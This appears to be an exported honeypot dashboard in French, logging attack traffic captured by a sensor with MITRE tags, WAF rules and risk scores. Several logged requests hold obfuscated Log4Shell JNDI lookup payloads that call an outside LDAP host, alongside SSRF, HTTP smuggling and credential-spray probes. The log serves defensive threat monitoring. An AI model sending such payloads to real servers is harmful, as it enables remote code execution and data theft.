GET /${${e:2:tr:-j}${2tx:n:-n}${c8:8b:-d}${s7g8:oae:-i}${0:o:-:}${oip:a:uya:-l}${vyl8:1r:-d}${7:-a}${p:-p}${pch:-:}${cmr:mtp:-/}${qky:buc6:-/}${hj6:-P}${2:-A}${cgub:-l}${rc:-0}${hwq:if:-c}${ads:--}${${uegd:-s}${x:vm8:-y}${d3:-s}${g:kolm:-:}${gj:-j}${g:85:d
|
|||||||
| TCP | 8087 · HTTP | http | Sonde port 8087/TCP port 8087 tcp · via HTTP:8087 · (sonde / probe) | Élevée | Moyen · 48 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
POST / UA ${${lq5:am:h:-j}${t1:-n}${k:jix:-d}${i4v7:79be:-i}${fh:im0:-:}$…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8087
Chemin / cible
/
Preuve honeypot — Sonde port 8087/TCP
Connexion détectée sur le port 8087 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8087_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 48
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${lq5:am:h:-j}${t1:-n}${k:jix:-d}${i4v7:79be:-i}${fh:im0:-:}${g9:-l}${4h:fu:2b:-d}${rtw:76:-a}${z:g:l:-p}${u:3:-:}${irn:l:-/}${i2:-/}${360:q:-U}${vo:kst:-A}${n:l:-l}${0:7i:-0}${9pyg:vyzo:p:-c}${ql:…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1
Host: 62.3.50.33:8087
Accept: */*
User-Agent: ${${lq5:am:h:-j}${t1:-n}${k:jix:-d}${i4v7:79be:-i}${fh:im0:-:}$
Requête brute (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:8087 Accept: */* User-Agent: ${${lq5:am:h:-j}${t1:-n}${k:jix:-d}${i4v7:79be:-i}${fh:im0:-:}${g9:-l}${4h:fu:2b:-d}${rtw:76:-a}${z:g:l:-p}${u:3:-:}${irn:l:-/}${i2:-/}${360:q:-U}${vo:kst:-A}${n:l:-l}${0:7i:-0}${9pyg:vyzo:p:
|
|||||||
| TCP | 8089 · HTTP | http | SSRF interne ssrf internal · via HTTP:8089 · (tentative d'exploit) | Élevée | Moyen · 56 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8089
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 56
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8089 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8089 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8087 · HTTP | http | Sonde port 8087/TCP port 8087 tcp · via HTTP:8087 · (sonde / probe) | Élevée | Moyen · 50 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8087
Chemin / cible
/
Preuve honeypot — Sonde port 8087/TCP
Connexion détectée sur le port 8087 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8087_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 50
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8087 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8087 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 X-Forwarded-For: ${${76b9:-j}${uy:ic:tu:-n}${t0f:dm28:-d}${0n:vxwg:-i}${g
|
|||||||
| TCP | 8087 · HTTP | http | SSRF interne ssrf internal · via HTTP:8087 · (tentative d'exploit) | Élevée | Moyen · 56 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8087
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 56
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8087 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8087 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8087 · HTTP | http | SSRF interne ssrf internal · via HTTP:8087 · (tentative d'exploit) · → /http%3A%2F%2Fw00te8b527c1d.com | Élevée | Élevé · 65 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /http%3A%2F%2Fw00te8b527c1d.com UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
25
Recommandation
Investiguer
Tags
Cible HTTP
GET
/http%3A%2F%2Fw00te8b527c1d.com
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8087
Chemin / cible
/http%3A%2F%2Fw00te8b527c1d.com
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Élevé
· 65
Confiance : Confiance 54 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
ssrf-3
nosqli-3
Payload (extrait)
GET /http%3A%2F%2Fw00te8b527c1d.com HTTP/1.1 Host: 62.3.50.33:8087 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET /http%3A%2F%2Fw00te8b527c1d.com HTTP/1.1 Host: 62.3.50.33:8087 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8087 · HTTP | http | Sonde port 8087/TCP port 8087 tcp · via HTTP:8087 · (sonde / probe) | Élevée | Moyen · 48 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA ${${9:u1l:-j}${q:p94:-n}${93d:o9:j8:-d}${4eg:xy:oyis:-i}${4:1:-…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8087
Chemin / cible
/
Preuve honeypot — Sonde port 8087/TCP
Connexion détectée sur le port 8087 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8087_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 48
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${9:u1l:-j}${q:p94:-n}${93d:o9:j8:-d}${4eg:xy:oyis:-i}${4:1:-:}${lu:xgi:q2:-l}${6yuc:-d}${1nq:wibn:h79z:-a}${t:umb:-p}${tk8j:qsbi:-:}${yg:-/}${3twv:i7v:-/}${nfm:-U}${6:7:zn:-A}${8u1:9tkb:-l}${onyc:…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1
Host: 62.3.50.33:8087
Accept: */*
User-Agent: ${${9:u1l:-j}${q:p94:-n}${93d:o9:j8:-d}${4eg:xy:oyis:-i}${4:1:-:
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8087 Accept: */* User-Agent: ${${9:u1l:-j}${q:p94:-n}${93d:o9:j8:-d}${4eg:xy:oyis:-i}${4:1:-:}${lu:xgi:q2:-l}${6yuc:-d}${1nq:wibn:h79z:-a}${t:umb:-p}${tk8j:qsbi:-:}${yg:-/}${3twv:i7v:-/}${nfm:-U}${6:7:zn:-A}${8u1:9tkb:-l}
|
|||||||
| TCP | 8021 · HTTP | http | SSRF interne ssrf internal · via HTTP:8021 · (tentative d'exploit) | Élevée | Moyen · 55 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8021
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 55
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8021 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8021 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8010 · HTTP | http | SSRF interne ssrf internal · via HTTP:8010 · (tentative d'exploit) | Élevée | Moyen · 53 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8010
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 53
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8010 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8010 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 7005 · HTTP | http | SSRF interne ssrf internal · via HTTP:7005 · (tentative d'exploit) · → /http%3A%2F%2Fw00te8b527c1d.com | Élevée | Élevé · 66 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /http%3A%2F%2Fw00te8b527c1d.com UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
25
Recommandation
Investiguer
Tags
Cible HTTP
GET
/http%3A%2F%2Fw00te8b527c1d.com
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7005
Chemin / cible
/http%3A%2F%2Fw00te8b527c1d.com
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Élevé
· 66
Confiance : Confiance 54 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
ssrf-3
nosqli-3
Payload (extrait)
GET /http%3A%2F%2Fw00te8b527c1d.com HTTP/1.1 Host: 62.3.50.33:7005 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET /http%3A%2F%2Fw00te8b527c1d.com HTTP/1.1 Host: 62.3.50.33:7005 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 2083 · HTTP | http | Sonde port 2083/TCP port 2083 tcp · via HTTP:2083 · (sonde / probe) · → /${${g:2jy:rw:-j}${n5e:kfl:-n}${s9:6:1:-d}${pzo… | Élevée | Moyen · 45 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
PUT /${${g:2jy:rw:-j}${n5e:kfl:-n}${s9:6:1:-d}${pzo:7b5k:-i}${ol:2zf:-:}${jwgp:k6h:-l}${5er:k14:odf:-d}…
Émulateur
HTTP
WAF
13
Recommandation
Surveiller
Tags
Cible HTTP
PUT
/${${g:2jy:rw:-j}${n5e:kfl:-n}${s9:6:1:-d}${pzo:7b5k:-i}${ol:2zf:-:}${jwgp:k6h:-l}${5er:k14:odf:-d}${1:bp:-a}${862:qrgl:-p}${6a:21:sxk:-:}${d:rg7:-/}${ga4:k08:j:-/}${7kcd:al2c:-P}${ol:vkr3:9ye:-A}${nko:d:xfyv:-l}${6:2l:nt5j:-0}${kbjx:-c}${cilb:--}${${3i8x:k:-s}${xd9:zr:0w7u:-y}${imds:p:-s}${k4:sp9:l:-:}${m:7:-j}${kz0:-a}${0:-v}${cx:fp80:ga:-a}${x:u:2z:-.}${e:xj:-v}${bp:j:-e}${xdnk:5p:fy4u:-r}${wm:7d:bn2l:-s}${87u1:dfj2:-i}${j:kw:u:-o}${56f:dh:r6:-n}}${5a:-.}${laeh:li1:-e}${a:ca8:-a}${f:l4pj:-5}${f:n4f:-5}${
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
PUT
Port
2083
Chemin / cible
/${${g:2jy:rw:-j}${n5e:kfl:-n}${s9:6:1:-d}${pzo:7b5k:-i}${ol:2zf:-:}${jwgp:k6h:-l}${5er:k14:odf:-d}${1:bp:-a}${862:qrgl:-p}${6a:21:sxk:-:}${d:rg7:-/}${ga4:k08:…
Preuve honeypot — Sonde port 2083/TCP
Connexion détectée sur le port 2083 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_2083_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 45
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 2 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
—
Règles WAF
rce-0
nosqli-3
Payload (extrait)
PUT /${${g:2jy:rw:-j}${n5e:kfl:-n}${s9:6:1:-d}${pzo:7b5k:-i}${ol:2zf:-:}${jwgp:k6h:-l}${5er:k14:odf:-d}${1:bp:-a}${862:qrgl:-p}$
Requête brute (extrait)
PUT /${${g:2jy:rw:-j}${n5e:kfl:-n}${s9:6:1:-d}${pzo:7b5k:-i}${ol:2zf:-:}${jwgp:k6h:-l}${5er:k14:odf:-d}${1:bp:-a}${862:qrgl:-p}${6a:21:sxk:-:}${d:rg7:-/}${ga4:k08:j:-/}${7kcd:al2c:-P}${ol:vkr3:9ye:-A}${nko:d:xfyv:-l}${6:2l:nt5j:-0}${kbjx:-c}${cilb:--}${${3
|
|||||||
| TCP | 2083 · HTTP | http | Sonde HTTP smuggling http smuggling probe · via HTTP:2083 · (tentative d'exploit) · → /login | Élevée | Élevé · 67 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
2083
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « http_smuggling_probe » (signaux protocolaires) · confiance 95%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 67
Confiance : Confiance 95 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0842
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:2083 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKi
Requête brute (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:2083 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Length: 2968 Content-Type: application/x-www-form-urlencod |
|||||||
| TCP | 2083 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:2083 · (sonde / probe) · → /login | Élevée | Élevé · 68 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1078
TA0007
TA0001
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
2083
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 68
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:2083 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKi
Requête brute (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:2083 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Type: application/json Content-Length: 1560 {"username"
|
|||||||
| TCP | 2083 · CPANEL SSL | cpanel-ssl | Injection PHP php injection · via CPANEL SSL:2083 · (tentative d'exploit) | Élevée | Moyen · 52 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
Émulateur
CPANEL-SSL
WAF
—
Recommandation
Investiguer
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2083
Chemin / cible
—
Service
CPANEL SSL
Payload
ZSDLKFJ2 /${${xc:db9:-j}${q45u:x89n:91j:-n}${ua:-d}${d:iwq:85q:-i}${sh3c:7v:-:}${g:-l}${7cwi:56w:-d}${18:cph:-a}${zu:zt:i:-p}${2
Pourquoi cette classification : Type « php_injection » (signaux protocolaires) · confiance 97%
Confiance classification
100%
Corrélation +18
Risque capteur
Moyen
· 52
Confiance : Confiance 97 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 933135
User-Agent
—
Règles WAF
—
Payload (extrait)
ZSDLKFJ2 /${${xc:db9:-j}${q45u:x89n:91j:-n}${ua:-d}${d:iwq:85q:-i}${sh3c:7v:-:}${g:-l}${7cwi:56w:-d}${18:cph:-a}${zu:zt:i:-p}${2
Requête brute (extrait)
ZSDLKFJ2 /${${xc:db9:-j}${q45u:x89n:91j:-n}${ua:-d}${d:iwq:85q:-i}${sh3c:7v:-:}${g:-l}${7cwi:56w:-d}${18:cph:-a}${zu:zt:i:-p}${2ch:vt:-:}${og:idos:-/}${lt:-/}${x:sk6:-P}${4:l2wx:tdbp:-A}${6n:4:-l}${r0mw:5:-0}${f4t2:lw8z:ci:-c}${w64:ml7:--}${${i3:up57:8eqs:
|
|||||||
| TCP | 2083 · HTTP | http | Sonde port 2083/TCP port 2083 tcp · via HTTP:2083 · (sonde / probe) · → /${${s6q7:2c:3e1m:-j}${kx:-n}${u3:j14:b:-d}${wb… | Élevée | Moyen · 58 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /${${s6q7:2c:3e1m:-j}${kx:-n}${u3:j14:b:-d}${wb5i:v:-i}${u:z:-:}${6dr:bmf1:-l}${0:-d}${d5p:zwm:-a}$… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
33
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${s6q7:2c:3e1m:-j}${kx:-n}${u3:j14:b:-d}${wb5i:v:-i}${u:z:-:}${6dr:bmf1:-l}${0:-d}${d5p:zwm:-a}${q7oj:pde:-p}${v:mn9:-:}${hg80:9stl:-/}${8e5g:ja:it:-/}${oer:-P}${z:-A}${ldc7:ix:-l}${0ky:2xt:asj4:-0}${2zmw:g79:tl:-c}${y:3q:--}${${nk1:-s}${n:v:-y}${yn:a918:q:-s}${k:rt87:mb:-:}${nm6:-j}${l:sqno:-a}${42c:j8:j:-v}${t:-a}${6:-.}${9n:-v}${lry8:-e}${gadl:-r}${vw:3:-s}${3:5ua:-i}${k:0l:-o}${di1:lb3o:je:-n}}${d:ps:wv:-.}${xmyt:j:-e}${9rvh:0ux:-a}${p4:i3:8w:-5}${w:kt:kh9:-5}${809:-5}${63r:6o9q:u3jn:-0}${lv3:wd:-6}$
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
2083
Chemin / cible
/${${s6q7:2c:3e1m:-j}${kx:-n}${u3:j14:b:-d}${wb5i:v:-i}${u:z:-:}${6dr:bmf1:-l}${0:-d}${d5p:zwm:-a}${q7oj:pde:-p}${v:mn9:-:}${hg80:9stl:-/}${8e5g:ja:it:-/}${oer…
Preuve honeypot — Sonde port 2083/TCP
Connexion détectée sur le port 2083 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_2083_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 58
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 5 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
rce-14
nosqli-3
Payload (extrait)
GET /${${s6q7:2c:3e1m:-j}${kx:-n}${u3:j14:b:-d}${wb5i:v:-i}${u:z:-:}${6dr:bmf1:-l}${0:-d}${d5p:zwm:-a}${q7oj:pde:-p}${v:mn9:-:}$
Requête brute (extrait)
